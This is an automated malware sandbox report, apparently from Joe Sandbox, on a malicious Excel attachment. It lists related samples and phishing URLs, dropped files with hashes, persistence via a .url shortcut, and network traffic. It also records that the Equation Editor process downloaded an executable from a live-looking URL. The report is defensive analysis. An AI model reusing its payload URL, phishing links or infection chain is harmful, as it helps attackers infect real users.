                                                            eybgvwBamW.exeGet hashmaliciousBrowse
                                                              R#U00d6SLER Puchase_tcs 10-28-2020,pdf.exeGet hashmaliciousBrowse
                                                                Payment of bank details,zip.exeGet hashmaliciousBrowse
                                                                  Documentos_ordine.exeGet hashmaliciousBrowse
                                                                    PO CBV87654468,pdf.exeGet hashmaliciousBrowse

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      discord.comRFQ For TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exeGet hashmaliciousBrowse
                                                                      • 162.159.137.232
                                                                      Scan 25112020 pdf.exeGet hashmaliciousBrowse
                                                                      • 162.159.137.232
                                                                      Piraeus Bank_swift_.exeGet hashmaliciousBrowse
                                                                      • 162.159.128.233
                                                                      Q21rQw2C4o.exeGet hashmaliciousBrowse
                                                                      • 162.159.137.232
                                                                      Q21rQw2C4o.exeGet hashmaliciousBrowse
                                                                      • 162.159.128.233
                                                                      tzjEwwwbqK.exeGet hashmaliciousBrowse
                                                                      • 162.159.136.232
                                                                      DHL_Express_Consignment_Details.exeGet hashmaliciousBrowse
                                                                      • 162.159.138.232
                                                                      New Microsoft Office Excel Worksheet.xlsxGet hashmaliciousBrowse
                                                                      • 162.159.136.232
                                                                      Komfkim_Signed_.exeGet hashmaliciousBrowse
                                                                      • 162.159.135.232
                                                                      oUI0jQS8xQ.exeGet hashmaliciousBrowse
                                                                      • 162.159.137.232
                                                                      USD67,884.08_Payment_Advise_9083008849.exeGet hashmaliciousBrowse
                                                                      • 162.159.136.232
                                                                      USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEGet hashmaliciousBrowse
                                                                      • 162.159.138.232
                                                                      NyUnwsFSCa.exeGet hashmaliciousBrowse
                                                                      • 162.159.135.232
                                                                      Fl0aIIH39W.exeGet hashmaliciousBrowse
                                                                      • 162.159.138.232
                                                                      PO#0007507_009389283882873PDF.exeGet hashmaliciousBrowse
                                                                      • 162.159.135.232
                                                                      9Pimjl3jyq.exeGet hashmaliciousBrowse
                                                                      • 162.159.138.232
                                                                      D6vy84I7rJ.exeGet hashmaliciousBrowse
                                                                      • 162.159.135.232
                                                                      RFQ for TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exeGet hashmaliciousBrowse
                                                                      • 162.159.138.232
                                                                      Payment Confirmation NOV-85869983TGTTAS.exeGet hashmaliciousBrowse
                                                                      • 162.159.128.233
                                                                      LAX28102020HBL_AMSLAX1056_CTLQD06J0BL_PO_DTH266278_RFQ.exeGet hashmaliciousBrowse
                                                                      • 162.159.137.232

                                                                      ASN

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      CLOUDFLARENETUSSecuriteInfo.com.Trojan.Nanocore.23.20965.exeGet hashmaliciousBrowse
                                                                      • 104.23.98.190
                                                                      SecuriteInfo.com.Mal.Generic-S.26042.exeGet hashmaliciousBrowse
                                                                      • 172.67.143.180
                                                                      trackinginfo#U007eupdate.jarGet hashmaliciousBrowse
                                                                      • 104.20.23.46
                                                                      trackinginfo#U007eupdate.jarGet hashmaliciousBrowse
                                                                      • 104.20.22.46
                                                                      MAL.PPTGet hashmaliciousBrowse
                                                                      • 172.67.219.133
                                                                      https://34.75.2o2.lol/XYWNc0aW9uPWwNsaWNrJngVybD1ovndHRwnczovL3NleY3wVyZWQtbG9naW4ubmV0nL3BhZ2VzLzQyY2FkNTJhZmU3YSZyZWNpcGllbnRfaWQ9NzM2OTg3ODg4JmNhbXBhaWduX3J1bl9pZD0zOTM3OTczGet hashmaliciousBrowse
                                                                      • 104.16.18.94
                                                                      https://bit.do/fLpprGet hashmaliciousBrowse
                                                                      • 104.27.146.211
                                                                      SecuriteInfo.com.BehavesLike.Win32.VirRansom.rm.exeGet hashmaliciousBrowse
                                                                      • 104.23.99.190
                                                                      SecuriteInfo.com.Trojan.KillProc2.14740.25300.exeGet hashmaliciousBrowse
                                                                      • 104.23.99.190
                                                                      https://rb.gy/flx7juGet hashmaliciousBrowse
                                                                      • 104.28.9.39
                                                                      https://bit.ly/3kUgQ0HGet hashmaliciousBrowse
                                                                      • 172.67.131.94
                                                                      EME_PO.47563.xlsxGet hashmaliciousBrowse
                                                                      • 23.227.38.74
                                                                      Shipping documents.xlsxGet hashmaliciousBrowse
                                                                      • 104.16.16.194
                                                                      https://webmail-re5rere.web.app/?emailtoken=test@test.com&domain=test.comGet hashmaliciousBrowse
                                                                      • 162.159.138.81
                                                                      Nota di consegna_TNT507CC.exeGet hashmaliciousBrowse
                                                                      • 104.18.54.93
                                                                      txema_inef_post_live_loader_88.exeGet hashmaliciousBrowse
                                                                      • 104.18.35.76
                                                                      due-invoice.xlsmGet hashmaliciousBrowse
                                                                      • 104.23.98.190
                                                                      ANGEBOTXANFORDERNXXXXXXXXX26-11-2020.pptGet hashmaliciousBrowse
                                                                      • 104.18.49.20
                                                                      SecuriteInfo.com.Gen.NN.ZemsilF.34658.m0@a8V1yrei.exeGet hashmaliciousBrowse
                                                                      • 104.24.126.89
                                                                      http://nity.midlidl.com/indexGet hashmaliciousBrowse
                                                                      • 104.28.14.54
                                                                      DIGITALOCEAN-ASNUShttps://rb.gy/flx7juGet hashmaliciousBrowse
                                                                      • 138.68.185.92
                                                                      Shipping INVOICE-BL Shipment..exeGet hashmaliciousBrowse
                                                                      • 165.227.229.15
                                                                      CompensationClaim-261722907-11242020.xlsGet hashmaliciousBrowse
                                                                      • 157.245.97.213
                                                                      CompensationClaim-261722907-11242020.xlsGet hashmaliciousBrowse
                                                                      • 157.245.97.213
                                                                      http://searchlf.comGet hashmaliciousBrowse
                                                                      • 82.196.7.246
                                                                      Izezma64.dllGet hashmaliciousBrowse
                                                                      • 68.183.89.248
                                                                      fuxenm32.dllGet hashmaliciousBrowse
                                                                      • 68.183.89.248
                                                                      ebuQ5cmR6y.docGet hashmaliciousBrowse
                                                                      • 138.197.207.88
                                                                      https://doc.clickup.com/p/h/84zph-7/c3996c24fc61b45Get hashmaliciousBrowse
                                                                      • 161.35.15.77
                                                                      22.exeGet hashmaliciousBrowse
                                                                      • 134.122.48.156
                                                                      CompensationClaim-310074970-11242020.xlsGet hashmaliciousBrowse
                                                                      • 157.245.97.213
                                                                      CompensationClaim-310074970-11242020.xlsGet hashmaliciousBrowse
                                                                      • 157.245.97.213
                                                                      https://cts.indeed.com/v0?tk=1df9t5skc2g3980p&r=%68%74%74%70%73%3a%2f%2f%61%6e%61%6c%79%74%69%63%73%2e%74%77%69%74%74%65%72%2e%63%6f%6d%2f%64%61%61%2f%30%2f%64%61%61%5f%6f%70%74%6f%75%74%5f%61%63%74%69%6f%6e%73%3f%61%63%74%69%6f%6e%5f%69%64%3d%33%26%70%61%72%74%69%63%69%70%61%6e%74%5f%69%64%3d%37%31%36%26%72%64%3d%68%74%74%70%73%3a%2f%2f%66%72%61%31%2e%64%69%67%69%74%61%6c%6f%63%65%61%6e%73%70%61%63%65%73%2e%63%6f%6d%2f%73%32%32%2f%69%6e%64%65%78%2e%68%74%6d%6c%3f#matthias.kirsch@iti.orgGet hashmaliciousBrowse
                                                                      • 5.101.109.44
                                                                      C03N224Hbu.exeGet hashmaliciousBrowse
                                                                      • 206.189.230.189
                                                                      Izipubob.dllGet hashmaliciousBrowse
                                                                      • 68.183.54.143
                                                                      http://ttixwac.sed.ocscreenwriter.comGet hashmaliciousBrowse
                                                                      • 138.197.59.238
                                                                      nivude1.dllGet hashmaliciousBrowse
                                                                      • 68.183.54.143
                                                                      Accesshover.dllGet hashmaliciousBrowse
                                                                      • 68.183.54.143
                                                                      https://comvoce.philco.com.br/wp-forum/administracion/prelogin.phpGet hashmaliciousBrowse
                                                                      • 157.230.76.65
                                                                      https://ilovesanmarzanodop.com/wp-content/uploads/2020/supp/adfs/index.htmlGet hashmaliciousBrowse
                                                                      • 164.90.215.56
                                                                      UNIFIEDLAYER-AS-1USdocument-1654302018.xlsGet hashmaliciousBrowse
                                                                      • 192.185.215.146
                                                                      document-1654302018.xlsGet hashmaliciousBrowse
                                                                      • 192.185.215.146
                                                                      document-176142694.xlsGet hashmaliciousBrowse
                                                                      • 192.185.215.146
                                                                      document-176142694.xlsGet hashmaliciousBrowse
                                                                      • 192.185.215.146
                                                                      document-1710831256.xlsGet hashmaliciousBrowse
                                                                      • 192.185.215.146
                                                                      document-1773066947.xlsGet hashmaliciousBrowse
                                                                      • 192.185.215.146
                                                                      document-1773066947.xlsGet hashmaliciousBrowse
                                                                      • 192.185.215.146
                                                                      document-1758249588.xlsGet hashmaliciousBrowse
                                                                      • 192.185.215.146
                                                                      document-1758249588.xlsGet hashmaliciousBrowse
                                                                      • 192.185.215.146
                                                                      https://dealmaker.pl/au_au.htmlGet hashmaliciousBrowse
                                                                      • 192.185.186.178
                                                                      document-1757513108.xlsGet hashmaliciousBrowse
                                                                      • 192.185.215.146
                                                                      document-1757513108.xlsGet hashmaliciousBrowse
                                                                      • 192.185.215.146
                                                                      https://wilkinsonbutler.tallverse.ga/YW1iZXJAd2lsa2luc29uYnV0bGVyLmNvbQ==Get hashmaliciousBrowse
                                                                      • 162.241.126.159
                                                                      https://wilkinsonbutler.tallverse.ga/YW1iZXJAd2lsa2luc29uYnV0bGVyLmNvbQ==Get hashmaliciousBrowse
                                                                      • 162.241.126.159
                                                                      document-1706969672.xlsGet hashmaliciousBrowse
                                                                      • 192.185.215.146
                                                                      document-1706969672.xlsGet hashmaliciousBrowse
                                                                      • 192.185.215.146
                                                                      document-1740914998.xlsGet hashmaliciousBrowse
                                                                      • 192.185.215.146
                                                                      document-1740914998.xlsGet hashmaliciousBrowse
                                                                      • 192.185.215.146
                                                                      document-1745935583.xlsGet hashmaliciousBrowse
                                                                      • 192.185.215.146
                                                                      document-1745935583.xlsGet hashmaliciousBrowse
                                                                      • 192.185.215.146

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Hqfadrv.exe
                                                                      Process:C:\Users\Public\name.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):1218752
                                                                      Entropy (8bit):7.109875910384301
                                                                      Encrypted:false
                                                                      SSDEEP:24576:3RVtvQ+csIDccuZGhe1ppCmfwybRk8zQKtALblKCeNRbO+v:3R/ovVcOM1pJwYrzQ0t
                                                                      MD5:45E25807FC1BD31A0B8309C44AFCE6E4
                                                                      SHA1:F070047F9DF99461C951F3973E3BF3E468A96A31
                                                                      SHA-256:344CA08FA2FDB87931CEB1E336019231BFBA189458BE0D3FA5016B5895D96CC6
                                                                      SHA-512:4D435EE7CA5A983B628294815BB64B5B58ABBED67724DA35BC5AD3CF88CC337375D529DB1882D27C20599413D566BFA841B9275833A2C925C72669CBBC8BE14F
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      Reputation:low
                                                                      Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................V....................@..............................................@...........................P...$...0...|...........D...T......4...................................................................................CODE................................ ..`DATA.....!......."..................@...BSS.....5....0...........................idata...$...P...&..................@....tls....@............6...................rdata...............6..............@..P.reloc..4............8..............@..P.rsrc....|...0...|..................@..P.....................B..............@..P........................................................................................................................................
                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lxpo[1].exe
                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:downloaded
                                                                      Size (bytes):1218752
                                                                      Entropy (8bit):7.109875910384301
                                                                      Encrypted:false
                                                                      SSDEEP:24576:3RVtvQ+csIDccuZGhe1ppCmfwybRk8zQKtALblKCeNRbO+v:3R/ovVcOM1pJwYrzQ0t
                                                                      MD5:45E25807FC1BD31A0B8309C44AFCE6E4
                                                                      SHA1:F070047F9DF99461C951F3973E3BF3E468A96A31
                                                                      SHA-256:344CA08FA2FDB87931CEB1E336019231BFBA189458BE0D3FA5016B5895D96CC6
                                                                      SHA-512:4D435EE7CA5A983B628294815BB64B5B58ABBED67724DA35BC5AD3CF88CC337375D529DB1882D27C20599413D566BFA841B9275833A2C925C72669CBBC8BE14F
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      Reputation:low
                                                                      IE Cache URL:http://khunnapap.com/inc/lxpo.exe
                                                                      Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................V....................@..............................................@...........................P...$...0...|...........D...T......4...................................................................................CODE................................ ..`DATA.....!......."..................@...BSS.....5....0...........................idata...$...P...&..................@....tls....@............6...................rdata...............6..............@..P.reloc..4............8..............@..P.rsrc....|...0...|..................@..P.....................B..............@..P........................................................................................................................................
                                                                      C:\Users\user\AppData\Local\afqH.url
                                                                      Process:C:\Users\Public\name.exe
                                                                      File Type:MS Windows 95 Internet shortcut text (URL=<file:\\\C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Hqfadrv.exe>), ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):169
                                                                      Entropy (8bit):5.174497935559406
                                                                      Encrypted:false
                                                                      SSDEEP:3:HRAbABGQYmHmEX+6JwGcVh4EkD5oef5yaKCNvQJ5ontCBuXV9k/qIH19Yxv:HRYFVmc6JDkhJkDlR9LNvQJ5OtZF9k/4
                                                                      MD5:E158D6BAC2A5E2BCE21FAF2926136AE6
                                                                      SHA1:C70B6E338982DDF42FAC251F3F31CEEE33E34A8C
                                                                      SHA-256:4370DD4369B4854100575123C2842EC7571A1D066A6EF30A0121286DAE68E6FB
                                                                      SHA-512:D6CD09C6007E889AECC643FB4D531D2B98969A05E3BEBC1C4F6ECD740F13F32520C975DA02239F08BF2B93C98271C630043371312FBC7199D63C8AECB3D9CA8D
                                                                      Malicious:false
                                                                      Yara Hits:
                                                                      • Rule: Methodology_Shortcut_HotKey, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\user\AppData\Local\afqH.url, Author: @itsreallynick (Nick Carr)
                                                                      • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\user\AppData\Local\afqH.url, Author: @itsreallynick (Nick Carr)
                                                                      • Rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\user\AppData\Local\afqH.url, Author: @itsreallynick (Nick Carr)
                                                                      Reputation:low
                                                                      Preview: [InternetShortcut]..URL=file:\\\C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Hqfadrv.exe..IconIndex=1..IconFile=.url..Modified=20F06BA06D07BD014D..HotKey=1601..
                                                                      C:\Users\user\Desktop\~$SpecificationX20202611.xlsx
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):165
                                                                      Entropy (8bit):1.4377382811115937
                                                                      Encrypted:false
                                                                      SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                                      MD5:797869BB881CFBCDAC2064F92B26E46F
                                                                      SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                                      SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                                      SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                                      Malicious:true
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                      C:\Users\Public\name.exe
                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):1218752
                                                                      Entropy (8bit):7.109875910384301
                                                                      Encrypted:false
                                                                      SSDEEP:24576:3RVtvQ+csIDccuZGhe1ppCmfwybRk8zQKtALblKCeNRbO+v:3R/ovVcOM1pJwYrzQ0t
                                                                      MD5:45E25807FC1BD31A0B8309C44AFCE6E4
                                                                      SHA1:F070047F9DF99461C951F3973E3BF3E468A96A31
                                                                      SHA-256:344CA08FA2FDB87931CEB1E336019231BFBA189458BE0D3FA5016B5895D96CC6
                                                                      SHA-512:4D435EE7CA5A983B628294815BB64B5B58ABBED67724DA35BC5AD3CF88CC337375D529DB1882D27C20599413D566BFA841B9275833A2C925C72669CBBC8BE14F
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      Reputation:low
                                                                      Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................V....................@..............................................@...........................P...$...0...|...........D...T......4...................................................................................CODE................................ ..`DATA.....!......."..................@...BSS.....5....0...........................idata...$...P...&..................@....tls....@............6...................rdata...............6..............@..P.reloc..4............8..............@..P.rsrc....|...0...|..................@..P.....................B..............@..P........................................................................................................................................

                                                                      Static File Info

                                                                      General

                                                                      File type:Microsoft Excel 2007+
                                                                      Entropy (8bit):7.998421974370225
                                                                      TrID:
                                                                      • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                                                      • ZIP compressed archive (8000/1) 16.67%
                                                                      File name:SpecificationX20202611.xlsx
                                                                      File size:144657
                                                                      MD5:8bbf38221e93da549de22199cafb1ece
                                                                      SHA1:4d650073a4fd46217e891c94d6eca54644addfb6
                                                                      SHA256:1cea11e60bce272e08ef8906924229cc33ba41dc2903ca2c397eb0ca70d85196
                                                                      SHA512:2c57986b3a939e3f7e197cf043ec20e6edb7c0b4d5eb43420070faee69e9fe6cda8549b76a2abe8b012fa60523bef13f35df0bc290bfd235914f55b9a0b392dd
                                                                      SSDEEP:3072:WvZR/rQhV8Nr0Ehm5Rv9Nq4DJgje7kyF4Hgp+C30lUjC:QDMGmEh0R1Nq+g6F4+0OjC
                                                                      File Content Preview:PK.........UsQ....t...Y.......[Content_Types].xmlUT....L._.L._.L._...n.0.E.................T..N<!.~.c^..I.H.xUa.+..{....F.....T.f...X..pR.y.>go.'.`.V..,dl..F....l...R[.X..........y..S.`D..0.^..1....=....6vc....1.b.c.....L.hd....feLx.U!".....(.=!%e........

                                                                      File Icon

                                                                      Icon Hash:e4e2aa8aa4b4bcb4

                                                                      Static OLE Info

                                                                      General

                                                                      Document Type:OpenXML
                                                                      Number of OLE Files:1

                                                                      OLE File "/opt/package/joesandbox/database/analysis/323613/sample/SpecificationX20202611.xlsx"

                                                                      Indicators

                                                                      Has Summary Info:False
                                                                      Application Name:unknown
                                                                      Encrypted Document:False
                                                                      Contains Word Document Stream:
                                                                      Contains Workbook/Book Stream:
                                                                      Contains PowerPoint Document Stream:
                                                                      Contains Visio Document Stream:
                                                                      Contains ObjectPool Stream:
                                                                      Flash Objects Count:
                                                                      Contains VBA Macros:False

                                                                      Summary

                                                                      Author:User PC
                                                                      Last Saved By:User PC
                                                                      Create Time:2020-11-17T05:15:13Z
                                                                      Last Saved Time:2020-11-17T05:15:37Z
                                                                      Creating Application:Microsoft Excel
                                                                      Security:0

                                                                      Document Summary

                                                                      Thumbnail Scaling Desired:false
                                                                      Company:
                                                                      Contains Dirty Links:false
                                                                      Shared Document:false
                                                                      Changed Hyperlinks:false
                                                                      Application Version:15.0300

                                                                      Streams

                                                                      Stream Path: \x1OlE10NatiVE, File Type: data, Stream Size: 136853
                                                                      General
                                                                      Stream Path:\x1OlE10NatiVE
                                                                      File Type:data
                                                                      Stream Size:136853
                                                                      Entropy:7.99580138608
                                                                      Base64 Encoded:True
                                                                      Data ASCII:. . . . . . . . . . . . T . . . . . . . . | . m P . 3 . . . . . . . . . . o F . . . P . . . . . . . \\ . t u . . . . . B . k . o ] . v 4 . . . . . . . . m . . W . . . . { . . 9 . . . . . 7 . . . . . . C . . 8 . @ . . . i ? . g . P [ : ` . . . . . . . ' L . . X B . . f . . . . . Y . . . . ' x . . < . . . . . O . . . 7 6 J T . . ) . . . . . O . . . . . s t . . ' 7 _ b % w U . . . . ' 5 _ . . . . ` . . c P S 5 Z / . . < + . . . ( D . . 5 . F . 7 . . W . M . . . . . g . . . . . d . } . . . . 7 . . f . . . .
                                                                      Data Raw:f7 f5 f9 05 02 ac a0 80 f9 0d 01 08 54 bf bb be bd c7 a9 81 e3 7c bf 6d 50 8b 33 8b 06 bf fa f7 de 04 81 e7 b1 6f 46 b2 8b 0f 50 ff d1 05 20 fc 8d 8a 05 5c 14 74 75 ff e0 d6 d7 b0 42 00 6b c6 6f 5d b6 76 34 96 b7 d2 eb d1 ed f7 aa 6d dd b1 57 8d 81 a8 f7 7b ec 9e 39 93 96 95 b8 19 37 2e 08 0d 95 8c 12 43 1b 1a 38 df 40 05 d6 0a 69 3f 0a 67 ee 50 5b 3a 60 f5 c7 a0 ba 9a b0 ef 27 4c

                                                                      Network Behavior

                                                                      Snort IDS Alerts

                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                      11/27/20-08:27:06.195246TCP100000132COMMUNITY WEB-MISC Proxy Server Access8049165128.199.253.44192.168.2.22

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Nov 27, 2020 08:27:03.892057896 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:04.176641941 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:04.176758051 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:04.177026033 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:04.461309910 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:04.480389118 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:04.480454922 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:04.480487108 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:04.480504990 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:04.480504990 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:04.480545044 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:04.480555058 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:04.480602980 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:04.480602980 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:04.480643034 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:04.480654955 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:04.480698109 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:04.480705023 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:04.480745077 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:04.480753899 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:04.480802059 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:04.480803013 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:04.480844975 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:04.480850935 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:04.480894089 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:04.491564989 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:04.765470028 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:04.765556097 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:04.765614986 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:04.765672922 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:04.765702963 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:04.765722036 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:04.765732050 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:04.765733957 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:04.765769958 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:04.765788078 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:04.765841007 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:04.765842915 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:04.765888929 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:04.765898943 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:04.765955925 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:04.765959024 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:04.766019106 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:04.766037941 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:04.766073942 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:04.766077042 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:04.766109943 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:04.766129971 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:04.766184092 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:04.766185045 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:04.766241074 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:04.766243935 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:04.766295910 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:04.766298056 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:04.766352892 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:04.766355038 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:04.766407967 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:04.766410112 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:04.766464949 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:04.766464949 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:04.766520977 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:04.766526937 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:04.766566992 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:04.766571999 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:04.766623020 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:04.771090984 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:05.051208973 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:05.051291943 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:05.051320076 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:05.051347971 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:05.051395893 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:05.051404953 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:05.051419020 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:05.051676035 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:05.051733017 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:05.051739931 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:05.051755905 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:05.051783085 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:05.051819086 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:05.051834106 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:05.051875114 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:05.051882982 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:05.051894903 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:05.051932096 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:05.051934958 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:05.051980972 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:05.051995993 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:05.052030087 CET8049165128.199.253.44192.168.2.22
                                                                      Nov 27, 2020 08:27:05.052043915 CET4916580192.168.2.22128.199.253.44
                                                                      Nov 27, 2020 08:27:05.052079916 CET8049165128.199.253.44192.168.2.22
